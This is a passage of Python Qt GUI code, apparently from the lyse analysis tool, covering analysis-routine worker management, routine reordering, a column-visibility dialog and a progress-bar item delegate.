        index = self.get_row_index()
        if index is None:
            # Yelp, we've just been deleted. Nothing to do here.
            return
        status_item = self.model.item(index, self.COL_STATUS)
        if status == 'done':
            status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/tick'))
            self.done = True
            self.error = False
        elif status == 'working':
            status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/hourglass'))
            self.done = False
            self.error = False
        elif status == 'error':
            status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/exclamation'))
            self.error = True
            self.done = False
        elif status == 'clear':
            # Remove the icon entirely:
            status_item.setData(None, QtCore.Qt.DecorationRole)
            self.done = False
            self.error = False
        else:
            raise ValueError(status)
    @inmain_decorator()
    def enabled(self):
        """Whether this routine's checkbox is checked (False if the row has
        been deleted). Runs in the main thread via inmain_decorator."""
        index = self.get_row_index()
        if index is None:
            # Yelp, we've just been deleted.
            return False
        enabled_item = self.model.item(index, self.COL_ACTIVE)
        return (enabled_item.checkState() == QtCore.Qt.Checked)
    def get_row_index(self):
        """Returns the row index for this routine's row in the model"""
        # Implicitly returns None if no row matches our filepath (i.e. the
        # row has been removed from the model):
        for row in range(self.model.rowCount()):
            name_item = self.model.item(row, self.COL_NAME)
            fullpath = name_item.data(self.ROLE_FULLPATH)
            if fullpath == self.filepath:
                return row
    def restart(self):
        """Shut down the worker process and start a fresh one."""
        # TODO set status to 'restarting' or an icon or something, and gray out the item?
        self.end_child(restart=True)
    def remove(self):
        """End the child process and remove from the treeview"""
        self.end_child()
        index = self.get_row_index()
        if index is None:
            # Already gone
            return
        self.model.removeRow(index)
    def end_child(self, restart=False):
        """Politely ask the worker to quit, then begin polling for its exit,
        escalating to terminate/kill via check_child_exited."""
        self.to_worker.put(['quit', None])
        timeout_time = time.time() + 2
        self.exiting = True
        QtCore.QTimer.singleShot(50,
            lambda: self.check_child_exited(self.worker, timeout_time, kill=False, restart=restart))
    def check_child_exited(self, worker, timeout_time, kill=False, restart=False):
        """Poll the worker for exit every 50ms. If it hasn't exited by
        timeout_time, terminate it and give it two more seconds; if it still
        hasn't exited, kill it. Optionally start a replacement worker."""
        worker.poll()
        if worker.returncode is None and time.time() < timeout_time:
            # Still running, deadline not reached: poll again shortly.
            QtCore.QTimer.singleShot(50,
                lambda: self.check_child_exited(worker, timeout_time, kill, restart))
            return
        elif worker.returncode is None:
            if not kill:
                # Deadline passed: terminate, then re-poll with kill=True and
                # a fresh two-second deadline:
                worker.terminate()
                app.output_box.output('%s worker not responding.\n'%self.shortname)
                timeout_time = time.time() + 2
                QtCore.QTimer.singleShot(50,
                    lambda: self.check_child_exited(worker, timeout_time, kill=True, restart=restart))
                return
            else:
                worker.kill()
                app.output_box.output('%s worker killed\n'%self.shortname, red=True)
        elif kill:
            app.output_box.output('%s worker terminated\n'%self.shortname, red=True)
        else:
            app.output_box.output('%s worker exited cleanly\n'%self.shortname)
        # if analysis was running notify analysisloop that analysis has failed
        self.from_worker.put(('error', {}))
        if restart:
            self.to_worker, self.from_worker, self.worker = self.start_worker()
            app.output_box.output('%s worker restarted\n'%self.shortname)
        self.exiting = False
class TreeView(QtWidgets.QTreeView):
    """A QTreeView that emits leftClicked(index) when a left click is
    released over the same valid index it was pressed on, and
    doubleLeftClicked(index) in addition when that click completed a
    double click."""
    leftClicked = Signal(QtCore.QModelIndex)
    doubleLeftClicked = Signal(QtCore.QModelIndex)

    def __init__(self, *args):
        QtWidgets.QTreeView.__init__(self, *args)
        self._pressed_index = None
        self._double_click = False

    def mousePressEvent(self, event):
        result = QtWidgets.QTreeView.mousePressEvent(self, event)
        index = self.indexAt(event.pos())
        if index.isValid() and event.button() == QtCore.Qt.LeftButton:
            self._pressed_index = self.indexAt(event.pos())
        return result

    def leaveEvent(self, event):
        result = QtWidgets.QTreeView.leaveEvent(self, event)
        # Pointer left the widget: abandon any click in progress.
        self._pressed_index = None
        self._double_click = False
        return result

    def mouseDoubleClickEvent(self, event):
        # Ensure our left click event occurs regardless of whether it is the
        # second click in a double click or not
        result = QtWidgets.QTreeView.mouseDoubleClickEvent(self, event)
        index = self.indexAt(event.pos())
        if index.isValid() and event.button() == QtCore.Qt.LeftButton:
            self._pressed_index = self.indexAt(event.pos())
            self._double_click = True
        return result

    def mouseReleaseEvent(self, event):
        result = QtWidgets.QTreeView.mouseReleaseEvent(self, event)
        index = self.indexAt(event.pos())
        released_on_pressed_index = (
            event.button() == QtCore.Qt.LeftButton
            and index.isValid()
            and index == self._pressed_index
        )
        if released_on_pressed_index:
            self.leftClicked.emit(index)
            if self._double_click:
                self.doubleLeftClicked.emit(index)
        self._pressed_index = None
        self._double_click = False
        return result
class RoutineBox(object):
    """A box of analysis routines, either singleshot or multishot.

    Owns the treeview model listing the routines, the context menu and
    reordering actions, and a daemon thread (analysis_loop) that runs each
    enabled routine on files received from the filebox and reports progress
    back to it.
    """
    COL_ACTIVE = 0
    COL_STATUS = 1
    COL_NAME = 2
    ROLE_FULLPATH = QtCore.Qt.UserRole + 1
    # This data (stored in the name item) does not necessarily match
    # the position in the model. It will be set just
    # prior to sort() being called with this role as the sort data.
    # This is how we will reorder the model's rows instead of
    # using remove/insert.
    ROLE_SORTINDEX = QtCore.Qt.UserRole + 2
    def __init__(self, container, exp_config, filebox, from_filebox, to_filebox, output_box_port, multishot=False):
        self.multishot = multishot
        self.filebox = filebox
        self.exp_config = exp_config
        # Queues for receiving filepaths from, and sending progress to, the filebox:
        self.from_filebox = from_filebox
        self.to_filebox = to_filebox
        self.output_box_port = output_box_port
        self.logger = logging.getLogger('lyse.RoutineBox.%s'%('multishot' if multishot else 'singleshot'))
        loader = UiLoader()
        loader.registerCustomWidget(TreeView)
        self.ui = loader.load(os.path.join(LYSE_DIR, 'routinebox.ui'))
        container.addWidget(self.ui)
        if multishot:
            self.ui.groupBox.setTitle('Multishot routines')
        else:
            self.ui.groupBox.setTitle('Singleshot routines')
        self.model = UneditableModel()
        self.header = HorizontalHeaderViewWithWidgets(self.model)
        self.ui.treeView.setHeader(self.header)
        self.ui.treeView.setModel(self.model)
        active_item = QtGui.QStandardItem()
        active_item.setToolTip('Whether the analysis routine should run')
        status_item = QtGui.QStandardItem()
        status_item.setIcon(QtGui.QIcon(':qtutils/fugue/information'))
        # (typo fix: was "analyis")
        status_item.setToolTip('The status of this analysis routine\'s execution')
        name_item = QtGui.QStandardItem('name')
        name_item.setToolTip('The name of the python script for the analysis routine')
        self.select_all_checkbox = QtWidgets.QCheckBox()
        self.select_all_checkbox.setToolTip('whether the analysis routine should run')
        self.header.setWidget(self.COL_ACTIVE, self.select_all_checkbox)
        self.header.setStretchLastSection(True)
        self.select_all_checkbox.setTristate(False)
        self.model.setHorizontalHeaderItem(self.COL_ACTIVE, active_item)
        self.model.setHorizontalHeaderItem(self.COL_STATUS, status_item)
        self.model.setHorizontalHeaderItem(self.COL_NAME, name_item)
        self.model.setSortRole(self.ROLE_SORTINDEX)
        self.ui.treeView.resizeColumnToContents(self.COL_ACTIVE)
        self.ui.treeView.resizeColumnToContents(self.COL_STATUS)
        self.ui.treeView.setColumnWidth(self.COL_NAME, 200)
        self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
        # Make the actions for the context menu:
        self.action_set_selected_active = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'set selected routines active', self.ui)
        self.action_set_selected_inactive = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'set selected routines inactive', self.ui)
        self.action_restart_selected = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/arrow-circle'), 'restart worker process for selected routines', self.ui)
        self.action_remove_selected = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/minus'), 'Remove selected routines', self.ui)
        self.last_opened_routine_folder = self.exp_config.get('paths', 'analysislib')
        self.routines = []
        self.connect_signals()
        # Background thread that runs routines on files from the filebox:
        self.analysis = threading.Thread(target = self.analysis_loop)
        self.analysis.daemon = True
        self.analysis.start()
    def connect_signals(self):
        """Connect all UI signals to their handlers."""
        self.ui.toolButton_add_routines.clicked.connect(self.on_add_routines_clicked)
        self.ui.toolButton_remove_routines.clicked.connect(self.on_remove_selection)
        self.model.itemChanged.connect(self.on_model_item_changed)
        self.ui.treeView.doubleLeftClicked.connect(self.on_treeview_double_left_clicked)
        # A context manager with which we can temporarily disconnect the above connection.
        self.model_item_changed_disconnected = DisconnectContextManager(
            self.model.itemChanged, self.on_model_item_changed)
        self.select_all_checkbox.stateChanged.connect(self.on_select_all_state_changed)
        self.select_all_checkbox_state_changed_disconnected = DisconnectContextManager(
            self.select_all_checkbox.stateChanged, self.on_select_all_state_changed)
        self.ui.treeView.customContextMenuRequested.connect(self.on_treeView_context_menu_requested)
        self.action_set_selected_active.triggered.connect(
            lambda: self.on_set_selected_triggered(QtCore.Qt.Checked))
        self.action_set_selected_inactive.triggered.connect(
            lambda: self.on_set_selected_triggered(QtCore.Qt.Unchecked))
        self.action_restart_selected.triggered.connect(self.on_restart_selected_triggered)
        self.action_remove_selected.triggered.connect(self.on_remove_selection)
        self.ui.toolButton_move_to_top.clicked.connect(self.on_move_to_top_clicked)
        self.ui.toolButton_move_up.clicked.connect(self.on_move_up_clicked)
        self.ui.toolButton_move_down.clicked.connect(self.on_move_down_clicked)
        self.ui.toolButton_move_to_bottom.clicked.connect(self.on_move_to_bottom_clicked)
    def on_add_routines_clicked(self):
        """Prompt the user for analysis scripts to add as routines."""
        routine_files = QtWidgets.QFileDialog.getOpenFileNames(self.ui,
                                                           'Select analysis routines',
                                                           self.last_opened_routine_folder,
                                                           "Python scripts (*.py)")
        if type(routine_files) is tuple:
            # PyQt5/PySide2 return (files, selected_filter):
            routine_files, _ = routine_files
        if not routine_files:
            # User cancelled selection
            return
        # Convert to standard platform specific path, otherwise Qt likes forward slashes:
        routine_files = [os.path.abspath(routine_file) for routine_file in routine_files]
        # Save the containing folder for use next time we open the dialog box:
        self.last_opened_routine_folder = os.path.dirname(routine_files[0])
        self.add_routines([(routine_file, QtCore.Qt.Checked) for routine_file in routine_files])
    def add_routines(self, routine_files, clear_existing=False):
        """Add routines to the routine box, where routine_files is a list of
        tuples containing the filepath and whether the routine is enabled or
        not when it is added. if clear_existing == True, then any existing
        analysis routines will be cleared before the new ones are added."""
        if clear_existing:
            for routine in self.routines[:]:
                routine.remove()
                self.routines.remove(routine)
        # Queue the files to be opened:
        for filepath, checked in routine_files:
            if filepath in [routine.filepath for routine in self.routines]:
                app.output_box.output('Warning: Ignoring duplicate analysis routine %s\n'%filepath, red=True)
                continue
            routine = AnalysisRoutine(filepath, self.model, self.output_box_port, checked)
            self.routines.append(routine)
        self.update_select_all_checkstate()
    def on_treeview_double_left_clicked(self, index):
        """Open the double-clicked routine in the configured text editor."""
        # If double clicking on the the name item, open
        # the routine in the specified text editor:
        if index.column() != self.COL_NAME:
            return
        name_item = self.model.item(index.row(), self.COL_NAME)
        routine_filepath = name_item.data(self.ROLE_FULLPATH)
        # get path to text editor
        editor_path = self.exp_config.get('programs', 'text_editor')
        editor_args = self.exp_config.get('programs', 'text_editor_arguments')
        if not editor_path:
            error_dialog("No editor specified in the labconfig.")
            # Bugfix: previously execution fell through here and attempted to
            # launch an empty editor path; bail out instead.
            return
        if '{file}' in editor_args:
            # Split the args on spaces into a list, replacing {file} with the routine file:
            editor_args = [arg if arg != '{file}' else routine_filepath for arg in editor_args.split()]
        else:
            # Otherwise if {file} isn't already in there, append it to the other args:
            editor_args = [routine_filepath] + editor_args.split()
        try:
            subprocess.Popen([editor_path] + editor_args)
        except Exception as e:
            error_dialog("Unable to launch text editor specified in %s. Error was: %s" %
                         (self.exp_config.config_path, str(e)))
    def on_remove_selection(self):
        self.remove_selection()
    def remove_selection(self, confirm=True):
        """Remove the selected routines, asking for confirmation unless
        confirm=False, and shut down their worker processes."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        if not selected_rows:
            return
        if confirm and not question_dialog("Remove %d routines?" % len(selected_rows)):
            return
        name_items = [self.model.item(row, self.COL_NAME) for row in selected_rows]
        filepaths = [item.data(self.ROLE_FULLPATH) for item in name_items]
        for routine in self.routines[:]:
            if routine.filepath in filepaths:
                routine.remove()
                self.routines.remove(routine)
        self.update_select_all_checkstate()
    def on_model_item_changed(self, item):
        if item.column() == self.COL_ACTIVE:
            self.update_select_all_checkstate()
    def on_select_all_state_changed(self, state):
        """Propagate the 'select all' checkbox state to every routine."""
        with self.select_all_checkbox_state_changed_disconnected:
            # Do not allow a switch *to* a partially checked state:
            self.select_all_checkbox.setTristate(False)
            state = self.select_all_checkbox.checkState()
            with self.model_item_changed_disconnected:
                for row in range(self.model.rowCount()):
                    active_item = self.model.item(row, self.COL_ACTIVE)
                    active_item.setCheckState(state)
    def on_treeView_context_menu_requested(self, point):
        menu = QtWidgets.QMenu(self.ui.treeView)
        menu.addAction(self.action_set_selected_active)
        menu.addAction(self.action_set_selected_inactive)
        menu.addAction(self.action_restart_selected)
        menu.addAction(self.action_remove_selected)
        menu.exec_(QtGui.QCursor.pos())
    def on_set_selected_triggered(self, active):
        """Set the checked state of all selected routines to `active`."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        for row in selected_rows:
            active_item = self.model.item(row, self.COL_ACTIVE)
            active_item.setCheckState(active)
        self.update_select_all_checkstate()
    def on_move_to_top_clicked(self):
        """Move the selected routines to the top, preserving relative order."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        n = self.model.rowCount()
        i_selected = 0
        i_unselected = len(selected_rows)
        order = []
        for i in range(n):
            if i in selected_rows:
                order.append(i_selected)
                i_selected += 1
            else:
                order.append(i_unselected)
                i_unselected += 1
        self.reorder(order)
    def on_move_up_clicked(self):
        """Move each selected routine up one place, where possible."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        n = self.model.rowCount()
        order = []
        last_unselected_index = None
        for i in range(n):
            if i in selected_rows:
                if last_unselected_index is None:
                    # Already at the top (or blocked by other selected rows):
                    order.append(i)
                else:
                    # Swap with the unselected row above:
                    order.append(i - 1)
                    order[last_unselected_index] += 1
            else:
                last_unselected_index = i
                order.append(i)
        self.reorder(order)
    def on_move_down_clicked(self):
        """Move each selected routine down one place, where possible."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        n = self.model.rowCount()
        order = []
        last_unselected_index = None
        # Iterate from the bottom up, mirroring on_move_up_clicked:
        for i in reversed(range(n)):
            if i in selected_rows:
                if last_unselected_index is None:
                    order.insert(0, i)
                else:
                    order.insert(0, i + 1)
                    # Negative index: order is being built from the right.
                    order[last_unselected_index - n] -= 1
            else:
                last_unselected_index = i
                order.insert(0, i)
        self.reorder(order)
    def on_move_to_bottom_clicked(self):
        """Move the selected routines to the bottom, preserving relative order."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        n = self.model.rowCount()
        i_selected = n - len(selected_rows)
        i_unselected = 0
        order = []
        for i in range(n):
            if i in selected_rows:
                order.append(i_selected)
                i_selected += 1
            else:
                order.append(i_unselected)
                i_unselected += 1
        self.reorder(order)
    def on_restart_selected_triggered(self):
        """Restart the worker process of each selected routine."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        name_items = [self.model.item(row, self.COL_NAME) for row in selected_rows]
        filepaths = [item.data(self.ROLE_FULLPATH) for item in name_items]
        for routine in self.routines:
            if routine.filepath in filepaths:
                routine.restart()
        self.update_select_all_checkstate()
    def analysis_loop(self):
        """Daemon thread: run all routines on each file the filebox sends."""
        while True:
            filepath = self.from_filebox.get()
            if self.multishot:
                assert filepath is None
                # TODO: get the filepath of the output h5 file:
                # filepath = self.filechooserentry.get_text()
            self.logger.info('got a file to process: %s'%filepath)
            self.do_analysis(filepath)
    def todo(self):
        """How many analysis routines are not done?"""
        return len([r for r in self.routines if r.enabled() and not r.done])
    def do_analysis(self, filepath):
        """Run all analysis routines once on the given filepath,
        which is a shot file if we are a singleshot routine box"""
        for routine in self.routines:
            routine.set_status('clear')
        remaining = self.todo()
        error = False
        updated_data = {}
        while remaining:
            self.logger.debug('%d routines left to do'%remaining)
            # Find the next enabled, not-yet-done routine, if any:
            for routine in self.routines:
                if routine.enabled() and not routine.done:
                    break
            else:
                routine = None
            if routine is not None:
                self.logger.info('running analysis routine %s'%routine.shortname)
                routine.set_status('working')
                success, updated_data = routine.do_analysis(filepath)
                if success:
                    routine.set_status('done')
                    self.logger.debug('success')
                else:
                    routine.set_status('error')
                    self.logger.debug('failure')
                    error = True
                    break
            # Race conditions here, but it's only for reporting percent done
            # so it doesn't matter if it's wrong briefly:
            remaining = self.todo()
            total = len([r for r in self.routines if r.enabled()])
            done = total - remaining
            try:
                status_percent = 100*float(done)/(remaining + done)
            except ZeroDivisionError:
                # All routines got deleted mid-analysis, we're done here:
                status_percent = 100.0
            self.to_filebox.put(['progress', status_percent, updated_data])
        if error:
            self.to_filebox.put(['error', None, updated_data])
        else:
            self.to_filebox.put(['done', 100.0, {}])
        self.logger.debug('completed analysis of %s'%filepath)
    def reorder(self, order):
        """Reorder the model rows and self.routines so that the routine at
        old position i moves to new position order[i]."""
        assert len(order) == len(set(order)), 'ordering contains non-unique elements'
        # Apply the reordering to the liststore:
        for old_index, new_index in enumerate(order):
            name_item = self.model.item(old_index, self.COL_NAME)
            name_item.setData(new_index, self.ROLE_SORTINDEX)
        self.ui.treeView.sortByColumn(self.COL_NAME, QtCore.Qt.AscendingOrder)
        # Apply new order to our list of routines too:
        self.routines = [self.routines[order.index(i)] for i in range(len(order))]
    def update_select_all_checkstate(self):
        """Set the 'select all' checkbox to checked, unchecked or partial
        according to the states of the individual routines."""
        with self.select_all_checkbox_state_changed_disconnected:
            all_states = []
            for row in range(self.model.rowCount()):
                active_item = self.model.item(row, self.COL_ACTIVE)
                all_states.append(active_item.checkState())
            if all(state == QtCore.Qt.Checked for state in all_states):
                self.select_all_checkbox.setCheckState(QtCore.Qt.Checked)
            elif all(state == QtCore.Qt.Unchecked for state in all_states):
                self.select_all_checkbox.setCheckState(QtCore.Qt.Unchecked)
            else:
                self.select_all_checkbox.setCheckState(QtCore.Qt.PartiallyChecked)
class EditColumnsDialog(QtWidgets.QDialog):
    """Dialog that never closes itself: the close button only emits
    close_signal, leaving the owner to decide what to do."""
    # Emitted (with the native window id) when the window manager creates a
    # new window for this widget:
    newWindow = Signal(int)
    close_signal = Signal()

    def __init__(self):
        window_flags = QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint
        QtWidgets.QDialog.__init__(self, None, window_flags)

    def event(self, event):
        result = QtWidgets.QDialog.event(self, event)
        if event.type() == QtCore.QEvent.WinIdChange:
            self.newWindow.emit(self.effectiveWinId())
        return result

    def closeEvent(self, event):
        # Veto the close; notify the owner instead:
        self.close_signal.emit()
        event.ignore()
class EditColumns(object):
    """Dialog logic for choosing which columns of the filebox's shot table
    are visible. Edits apply live; 'cancel' reverts to the state when the
    dialog was shown."""
    ROLE_SORT_DATA = QtCore.Qt.UserRole + 1
    COL_VISIBLE = 0
    COL_NAME = 1
    def __init__(self, filebox, column_names, columns_visible):
        self.filebox = filebox
        # Work on copies so the dialog can be cancelled without having
        # mutated the caller's dicts:
        self.column_names = column_names.copy()
        self.columns_visible = columns_visible.copy()
        # Snapshot used to revert on cancel/close:
        self.old_columns_visible = columns_visible.copy()
        loader = UiLoader()
        self.ui = loader.load(os.path.join(LYSE_DIR, 'edit_columns.ui'), EditColumnsDialog())
        self.model = UneditableModel()
        self.header = HorizontalHeaderViewWithWidgets(self.model)
        self.select_all_checkbox = QtWidgets.QCheckBox()
        self.select_all_checkbox.setTristate(False)
        self.ui.treeView.setHeader(self.header)
        # Proxy model provides case-insensitive filtering on the name column:
        self.proxy_model = QtCore.QSortFilterProxyModel()
        self.proxy_model.setSourceModel(self.model)
        self.proxy_model.setFilterCaseSensitivity(QtCore.Qt.CaseInsensitive)
        self.proxy_model.setFilterKeyColumn(self.COL_NAME)
        self.ui.treeView.setSortingEnabled(True)
        self.header.setStretchLastSection(True)
        self.proxy_model.setSortRole(self.ROLE_SORT_DATA)
        self.ui.treeView.setModel(self.proxy_model)
        self.ui.setWindowModality(QtCore.Qt.ApplicationModal)
        self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
        # Make the actions for the context menu:
        self.action_set_selected_visible = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Show selected columns', self.ui)
        self.action_set_selected_hidden = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Hide selected columns', self.ui)
        self.connect_signals()
        self.populate_model(column_names, self.columns_visible)
    def connect_signals(self):
        """Connect all UI signals to their handlers."""
        if os.name == 'nt':
            self.ui.newWindow.connect(set_win_appusermodel)
        self.ui.close_signal.connect(self.close)
        self.ui.lineEdit_filter.textEdited.connect(self.on_filter_text_edited)
        self.ui.pushButton_make_it_so.clicked.connect(self.make_it_so)
        self.ui.pushButton_cancel.clicked.connect(self.cancel)
        self.model.itemChanged.connect(self.on_model_item_changed)
        # A context manager with which we can temporarily disconnect the above connection.
        self.model_item_changed_disconnected = DisconnectContextManager(
            self.model.itemChanged, self.on_model_item_changed)
        self.select_all_checkbox.stateChanged.connect(self.on_select_all_state_changed)
        self.select_all_checkbox_state_changed_disconnected = DisconnectContextManager(
            self.select_all_checkbox.stateChanged, self.on_select_all_state_changed)
        self.ui.treeView.customContextMenuRequested.connect(self.on_treeView_context_menu_requested)
        self.action_set_selected_visible.triggered.connect(
            lambda: self.on_set_selected_triggered(QtCore.Qt.Checked))
        self.action_set_selected_hidden.triggered.connect(
            lambda: self.on_set_selected_triggered(QtCore.Qt.Unchecked))
    def populate_model(self, column_names, columns_visible):
        """Rebuild the model: one row per (tuple-named) column, sorted by
        name, with a visibility checkbox per row."""
        self.model.clear()
        self.model.setHorizontalHeaderLabels(['', 'Name'])
        self.header.setWidget(self.COL_VISIBLE, self.select_all_checkbox)
        self.ui.treeView.resizeColumnToContents(self.COL_VISIBLE)
        # Which indices in self.columns_visible the row numbers correspond to
        self.column_indices = {}
        # Remove our special columns from the dict of column names by keeping only tuples:
        column_names = {i: name for i, name in column_names.items() if isinstance(name, tuple)}
        # Sort the column names as comma separated values, converting to lower case:
        sortkey = lambda item: ', '.join(item[1]).lower().strip(', ')
        for column_index, name in sorted(column_names.items(), key=sortkey):
            visible = columns_visible[column_index]
            visible_item = QtGui.QStandardItem()
            visible_item.setCheckable(True)
            # ROLE_SORT_DATA mirrors the check state so the proxy model can
            # sort by visibility:
            if visible:
                visible_item.setCheckState(QtCore.Qt.Checked)
                visible_item.setData(QtCore.Qt.Checked, self.ROLE_SORT_DATA)
            else:
                visible_item.setCheckState(QtCore.Qt.Unchecked)
                visible_item.setData(QtCore.Qt.Unchecked, self.ROLE_SORT_DATA)
            name_as_string = ', '.join(name).strip(', ')
            name_item = QtGui.QStandardItem(name_as_string)
            name_item.setData(sortkey((column_index, name)), self.ROLE_SORT_DATA)
            self.model.appendRow([visible_item, name_item])
            self.column_indices[self.model.rowCount() - 1] = column_index
        self.ui.treeView.resizeColumnToContents(self.COL_NAME)
        self.update_select_all_checkstate()
        self.ui.treeView.sortByColumn(self.COL_NAME, QtCore.Qt.AscendingOrder)
    def on_treeView_context_menu_requested(self, point):
        menu = QtWidgets.QMenu(self.ui)
        menu.addAction(self.action_set_selected_visible)
        menu.addAction(self.action_set_selected_hidden)
        menu.exec_(QtGui.QCursor.pos())
    def on_set_selected_triggered(self, visible):
        """Set visibility of all selected rows and apply to the filebox."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        # Map proxy (filtered/sorted) indexes back to source model rows:
        selected_rows = set(self.proxy_model.mapToSource(index).row() for index in selected_indexes)
        for row in selected_rows:
            visible_item = self.model.item(row, self.COL_VISIBLE)
            self.update_visible_state(visible_item, visible)
        self.update_select_all_checkstate()
        self.do_sort()
        self.filebox.set_columns_visible(self.columns_visible)
    def on_filter_text_edited(self, text):
        self.proxy_model.setFilterWildcard(text)
    def on_select_all_state_changed(self, state):
        """Propagate the 'select all' checkbox to every row and apply."""
        with self.select_all_checkbox_state_changed_disconnected:
            # Do not allow a switch *to* a partially checked state:
            self.select_all_checkbox.setTristate(False)
            state = self.select_all_checkbox.checkState()
            for row in range(self.model.rowCount()):
                visible_item = self.model.item(row, self.COL_VISIBLE)
                self.update_visible_state(visible_item, state)
        self.do_sort()
        self.filebox.set_columns_visible(self.columns_visible)
    def update_visible_state(self, item, state):
        """Set one row's check state, its sort data, and the corresponding
        entry of self.columns_visible, without re-triggering the
        itemChanged handler."""
        assert item.column() == self.COL_VISIBLE, "unexpected column"
        row = item.row()
        with self.model_item_changed_disconnected:
            item.setCheckState(state)
            item.setData(state, self.ROLE_SORT_DATA)
            if state == QtCore.Qt.Checked:
                self.columns_visible[self.column_indices[row]] = True
            else:
                self.columns_visible[self.column_indices[row]] = False
    def update_select_all_checkstate(self):
        """Set the 'select all' checkbox to checked/unchecked/partial based
        on the individual rows' states."""
        with self.select_all_checkbox_state_changed_disconnected:
            all_states = []
            for row in range(self.model.rowCount()):
                visible_item = self.model.item(row, self.COL_VISIBLE)
                all_states.append(visible_item.checkState())
            if all(state == QtCore.Qt.Checked for state in all_states):
                self.select_all_checkbox.setCheckState(QtCore.Qt.Checked)
            elif all(state == QtCore.Qt.Unchecked for state in all_states):
                self.select_all_checkbox.setCheckState(QtCore.Qt.Unchecked)
            else:
                self.select_all_checkbox.setCheckState(QtCore.Qt.PartiallyChecked)
    def on_model_item_changed(self, item):
        state = item.checkState()
        self.update_visible_state(item, state)
        self.update_select_all_checkstate()
        self.do_sort()
        self.filebox.set_columns_visible(self.columns_visible)
    def do_sort(self):
        # Re-apply whatever sort the user currently has selected:
        header = self.ui.treeView.header()
        sort_column = header.sortIndicatorSection()
        sort_order = header.sortIndicatorOrder()
        self.ui.treeView.sortByColumn(sort_column, sort_order)
    def update_columns(self, column_names, columns_visible):
        """Replace our column name/visibility dicts with new ones, keeping
        the 'previously visible' snapshot consistent across the change."""
        # Index/name mapping may have changed. Get a mapping by *name* of
        # which columns were previously visible, so we can update our by-index
        # mapping in a moment:
        old_columns_visible_by_name = {}
        for old_column_number, visible in self.old_columns_visible.items():
            column_name = self.column_names[old_column_number]
            old_columns_visible_by_name[column_name] = visible
        self.columns_visible = columns_visible.copy()
        self.column_names = column_names.copy()
        # Update the by-index mapping of which columns were visible before editing:
        self.old_columns_visible = {}
        for index, name in self.column_names.items():
            try:
                self.old_columns_visible[index] = old_columns_visible_by_name[name]
            except KeyError:
                # A new column. If editing is cancelled, any new columns
                # should be set to visible:
                self.old_columns_visible[index] = True
        self.populate_model(column_names, self.columns_visible)
    def show(self):
        # Snapshot current state so cancel can revert to it:
        self.old_columns_visible = self.columns_visible.copy()
        self.ui.show()
    def close(self):
        # Revert to the snapshot taken at show() and hide the dialog:
        self.columns_visible = self.old_columns_visible.copy()
        self.filebox.set_columns_visible(self.columns_visible)
        self.populate_model(self.column_names, self.columns_visible)
        self.ui.hide()
    def cancel(self):
        # Triggers close() via the dialog's close_signal:
        self.ui.close()
    def make_it_so(self):
        # Changes were already applied live; just hide the dialog:
        self.ui.hide()
class ItemDelegate(QtWidgets.QStyledItemDelegate):
    """An item delegate with a fixed row height that renders the status
    column as a progress bar whenever its progress is not 100%."""
    EXTRA_ROW_HEIGHT = 2

    def __init__(self, view, model, col_status, role_status_percent):
        self.view = view
        self.model = model
        self.COL_STATUS = col_status
        self.ROLE_STATUS_PERCENT = role_status_percent
        QtWidgets.QStyledItemDelegate.__init__(self)

    def sizeHint(self, *args):
        # Fixed height: the view's font height plus a small margin.
        metrics = QtGui.QFontMetrics(self.view.font())
        row_height = metrics.height() + self.EXTRA_ROW_HEIGHT
        default_size = QtWidgets.QStyledItemDelegate.sizeHint(self, *args)
        return QtCore.QSize(default_size.width(), row_height)

    def paint(self, painter, option, index):
        if index.column() != self.COL_STATUS:
            return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
        status_percent = self.model.data(index, self.ROLE_STATUS_PERCENT)
        if status_percent == 100:
            # Render as a normal item - this shows whatever icon is set
            # instead of a progress bar.
            return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
        # Method of rendering a progress bar into the view copied from
        # Qt's 'network-torrent' example:
        # http://qt-project.org/doc/qt-4.8/network-torrent-torrentclient-cpp.html
        # Set up a QStyleOptionProgressBar to precisely mimic the
        # environment of a progress bar.
        bar_option = QtWidgets.QStyleOptionProgressBar()
        bar_option.state = QtWidgets.QStyle.State_Enabled
        bar_option.direction = qapplication.layoutDirection()
        bar_option.rect = option.rect
        bar_option.fontMetrics = qapplication.fontMetrics()
        bar_option.minimum = 0
        bar_option.maximum = 100
        bar_option.textAlignment = QtCore.Qt.AlignCenter
        bar_option.textVisible = True
        # Set the progress and text values of the style option.
        bar_option.progress = status_percent
        bar_option.text = '%d%%' % status_percent
        # Draw the progress bar onto the view.
        qapplication.style().drawControl(QtWidgets.QStyle.CE_ProgressBar, bar_option, painter)
class UneditableModel(QtGui.QStandardItemModel):
    def flags(self, index):
        """Same flags as QStandardItemModel, except that ItemIsEditable is
        always cleared so no item can be edited in place."""
        default_flags = QtGui.QStandardItemModel.flags(self, index)
        return default_flags & ~QtCore.Qt.ItemIsEditable
class TableView(QtWidgets.QTableView):
    """A QTableView that emits leftClicked(index) when a left click is
    released over the same valid index it was pressed on, and
